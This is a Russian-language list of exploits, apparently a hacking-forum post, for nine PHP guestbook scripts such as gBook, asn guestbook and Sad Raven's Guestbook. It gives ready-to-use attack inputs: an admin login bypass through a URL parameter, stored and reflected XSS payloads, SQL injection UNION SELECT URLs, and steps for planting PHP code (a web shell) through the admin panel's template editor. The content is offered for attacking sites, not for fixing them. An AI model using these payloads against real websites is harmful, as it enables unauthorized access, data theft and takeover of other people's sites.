Гостевые книги:
1. gBook 1.4 MySQL Beta
Можно попасть в админку минуя ввод логина и пароля:
http://site.ru/gb/index.php?
login=true
--------------------
2. ScozBook BETA 1.1
Активные XSS:
При вводе сообщения в поля
AIM и
Web-Site Name вписываем скрипт (скрипт будет выполняться при просмотре сообщений).
--------------------
3. Tuchosoft guestbook v.0.2
Активные XSS:
При вводе сообщения в поля
Name,
email и
Homepage вписываем скрипт (скрипт будет выполняться при просмотре сообщений).
--------------------
4. asn guestbook 1.5
1) Пасивная XSS:
Код:
http://site.ru/gb/footer.php?version=<script>alert();</script>
2) Имея доступ к админке, можно сделать SQL инъекцию (к примеру для вывода инфы из других таблиц (к примеру таблиц от движка сайта)):
Код:
http://site.ru/gb/gbadmin.php?act=detil&id=-1+union+select+1,2,3,4,5,6,7,8/*
--------------------
5. Sad Raven's Guestbook v1.1
Заливка шела:
В админке выбираем "Настройки":
http://site.ru/gb/admin.php?design
Здесь можно редактровать файлы
header.inc.php и
footer.inc.php.
К примеру редактируем файл
footer.inc.php добавляя в него php код (к примеру
<?php echo(123); ?>).
Теперь заходим по адресу:
http://site.ru/gb/
design/footer.inc.php
и видим результат выполнения скрипта.
--------------------
6. Destinyd-Book 1.4
Пасивные XSS:
Код:
http://site.ru/gb/config/footer.php?copy=<script>alert();</script>
Код:
http://site.ru/gb/config/template.php?newname=<script>alert();</script>
--------------------
7. MLSOFT_quest 1.1
1) Активная XSS:
При вводе сообщения в поле
e-mail вписываем скрипт (скрипт будет выполняться при просмотре сообщений).
2) SQL инъекция:
Код:
http://site.ru/gb/index.php?action=quest&next=-1+union+select+1,2,3,4,5,6,7,8/*
--------------------
8. SD GBook 1.0
Активная XSS:
При вводе сообщения в поле
Город вписываем скрипт (скрипт будет выполняться при просмотре сообщений).
--------------------
9. XdN Guest Book 0.10
Пасивная XSS:
Код:
http://site.ru/inc_footer.php?fonts=<script>alert();</script>